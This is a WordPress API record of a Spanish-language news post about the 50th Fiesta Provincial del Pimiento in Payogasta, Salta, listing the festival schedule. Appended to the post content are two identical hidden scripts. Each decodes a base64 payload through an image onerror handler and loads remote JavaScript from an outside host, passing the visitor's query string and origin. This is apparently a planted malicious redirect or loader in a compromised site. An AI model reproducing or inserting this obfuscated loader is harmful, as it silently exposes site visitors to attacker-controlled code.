{"id":2891,"date":"2023-07-21T10:30:59","date_gmt":"2023-07-21T13:30:59","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2891"},"modified":"2025-08-14T00:12:07","modified_gmt":"2025-08-14T03:12:07","slug":"este-fin-de-semana-se-festejan-los-50-anos-de-la-fiesta-provincial-del-pimiento","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2891","title":{"rendered":"Este fin de semana se festejan los 50 a\u00f1os de la Fiesta Provincial del Pimiento"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#bd063d\"><em>Payogasta invita a turistas a festejar las bodas de oro a trav\u00e9s de una fiesta que rinde tributo a una de las actividades productivas m\u00e1s tradicionales de los Valles Calchaqu\u00edes.<\/em><\/h4>\n\n\n\n<p>Payogasta celebra las&nbsp;Bodas de Oro de la Fiesta Provincial Del Pimiento que se realizar\u00e1 el viernes 21 y s\u00e1bado 22 de julio en la localidad. La 50\u00b0 Edici\u00f3n contar\u00e1 con importantes actividades gastron\u00f3micas, culturales y religiosas en la denominada Semana del Piment\u00f3n.&nbsp;<\/p>\n\n\n\n<p>Los visitantes podr\u00e1n disfrutar de veladas art\u00edsticas, fogones, desfiles de carroza y danza. El cronograma previsto es el siguiente:<\/p>\n\n\n\n<p><strong>Viernes&nbsp; 21<\/strong><\/p>\n\n\n\n<p>&#8211; 19:00 hs.&nbsp; -Serenata-Velada a productores.<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-Fog\u00f3n de los agricultores.<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-Desfile de carrozas y paisanas, Patio de comidas, proyecciones<\/p>\n\n\n\n<p>-22:00 hs.&nbsp; -Espect\u00e1culos de canto y danza folkl\u00f3ricos Pre-Fiesta grande<\/p>\n\n\n\n<p><strong>S\u00e1bado 22<\/strong><\/p>\n\n\n\n<p>09:00 hs.&nbsp;&nbsp; -Recepci\u00f3n y concentraci\u00f3n de artesanos y productores.<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-Recepci\u00f3n de autoridades.<\/p>\n\n\n\n<p>10:00 hs.&nbsp;&nbsp; -Misa solemne en homenaje a los Agricultores.<\/p>\n\n\n\n<p>11:00 hs.&nbsp;&nbsp; -Acto Oficial. Izamiento de los pabellones Nacional y Provincial.&nbsp;<\/p>\n\n\n\n<p>Entonaci\u00f3n de las estrofas&nbsp; del&nbsp; Himno Nacional Argentino. Rese\u00f1a hist\u00f3rica de la Producci\u00f3n del Pimiento en Payogasta.<\/p>\n\n\n\n<p><strong>Descubrimiento de placa en honor a los Agricultores<\/strong><\/p>\n\n\n\n<p>11:00 hs.&nbsp; -Desfile y bendici\u00f3n de maquinarias, herramientas y semillas.<\/p>\n\n\n\n<p>13:00 hs.&nbsp; -Predio Ferial en&nbsp; Anfiteatro. Paseo artesanal y patio de comidas<\/p>\n\n\n\n<p><strong>Feria de Artesanos y Productores; Expo-muestra de maquinarias y herramientas&nbsp;y circuito productivo, juegos tradicionales.<\/strong><\/p>\n\n\n\n<p>14:00 hs.&nbsp; -Patio criollo, Festival folkl\u00f3rico<\/p>\n\n\n\n<p>20:00 hs.&nbsp; -Gran Baile del Pimiento en complejo polideportivo Municipal&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/este-fin-de-semana-se-festejan-los-50-anios-de-la-fiesta-provincial-del-pimiento-90780\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de prensa y difusi\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Payogasta invita a turistas a festejar las bodas de oro a trav\u00e9s de una fiesta que rinde tributo a una de las actividades productivas m\u00e1s tradicionales de los Valles Calchaqu\u00edes. Payogasta celebra las&nbsp;Bodas de Oro de la Fiesta Provincial Del Pimiento que se realizar\u00e1 el viernes 21 y s\u00e1bado 22 de julio en la localidad. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2892,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15,18],"tags":[],"class_list":{"0":"post-2891","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2891"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2891"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2891\/revisions"}],"predecessor-version":[{"id":7016,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2891\/revisions\/7016"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2892"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2891"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2891"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2891"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}